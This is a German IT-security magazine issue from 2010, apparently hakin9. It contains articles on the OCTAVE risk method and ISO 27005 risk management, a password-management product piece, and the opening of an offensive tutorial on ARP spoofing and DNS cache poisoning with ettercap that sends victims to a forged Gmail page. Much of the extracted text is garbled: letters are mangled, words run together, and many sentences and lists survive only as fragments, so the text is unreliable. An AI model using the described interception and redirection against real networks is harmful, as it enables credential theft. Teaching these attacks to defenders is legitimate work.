DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
